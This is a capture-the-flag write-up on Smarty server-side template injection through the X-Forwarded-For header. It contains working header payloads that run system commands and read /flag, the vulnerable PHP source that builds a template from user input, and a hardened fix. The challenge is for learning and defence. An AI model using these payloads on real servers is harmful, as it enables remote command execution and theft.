This challenge tests SSTI (server-side template injection) through the X-Forwarded-For (XFF) header. There is no filtering at all, so it counts as an introductory challenge.
Opening the source of hint.php in the challenge reveals a hint.
The guess is that the server reads information from the XFF header, so send an HTTP request with an XFF header added to test it:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:25656
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: test
The displayed IP has now changed to the header value, so the guess is that SSTI exists. Construct a template expression payload to test it:
X-Forwarded-For: {{system('ls')}}
The server executed our command, so simply cat /flag to get the flag:
X-Forwarded-For: {{system('cat /flag')}}
After solving the challenge, let's analyze its source. Here is the source of flag.php:
<?php
require_once('header.php');
require_once('./libs/Smarty.class.php');
$smarty = new Smarty();
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}
//$your_ip = $smarty->display("string:".$ip);
echo "<div class=\"container panel1\">
    <div class=\"row\">
        <div class=\"col-md-4\"> </div>
        <div class=\"col-md-4\">
            <div class=\"jumbotron pan\">
                <div class=\"form-group log\">
                    <label><h2>Your IP is : ";
$smarty->display("string:".$ip);
echo " </h2></label>
                </div>
            </div>
        </div>
        <div class=\"col-md-4\"> </div>
    </div>
</div>";
?>
The code that creates the SSTI is this line:
$smarty->display("string:".$ip)
The page uses the Smarty template engine, and the untrusted header value is concatenated directly into the template source of a "string:" resource, so Smarty evaluates whatever expressions it contains. For more on Smarty SSTI, see this article: https://www.jianshu.com/p/eb8d0137a7d3
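For comparison, here is a hardened version of the same IP display, added as an example and not part of the challenge. It assumes the same Smarty class path as flag.php; the helper resolve_client_ip and the trusted proxy list are constructed for illustration. The fix is twofold: validate the header value as an IP address and only trust it from a known proxy, and pass the value to Smarty as data via assign() instead of building the template source out of user input.

```php
<?php
// Added example (not the challenge's code): hardened IP display for flag.php.
// Assumes Smarty is available at ./libs/Smarty.class.php as in the original.
require_once('./libs/Smarty.class.php');

// Hypothetical helper: pick the client IP, but only honour X-Forwarded-For
// when the request arrived from a known reverse proxy, and validate the value
// as an IP address so a template expression can never reach the engine.
function resolve_client_ip(array $server, array $trusted_proxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (in_array($remote, $trusted_proxies, true)) {
        // XFF may be a comma-separated chain; the original client is the first entry.
        $xff   = $server['HTTP_X_FORWARDED_FOR'] ?? '';
        $first = trim(explode(',', $xff)[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    // Untrusted proxy, missing or malformed header: fall back to the TCP peer
    // address, which the client cannot set to an arbitrary string.
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : 'unknown';
}

// Constructed trusted proxy list for this example.
$ip = resolve_client_ip($_SERVER, ['127.0.0.1', '::1']);

$smarty = new Smarty();
// The template SOURCE is now a fixed string; the IP is template DATA.
// {$ip|escape} additionally HTML-escapes the value on output.
$smarty->assign('ip', $ip);
$smarty->display('string:<h2>Your IP is : {$ip|escape}</h2>');
?>
```

With this version a payload such as {{system('ls')}} in the header fails IP validation and is discarded, and even a value that did pass could only ever be rendered as text, never compiled as part of the template.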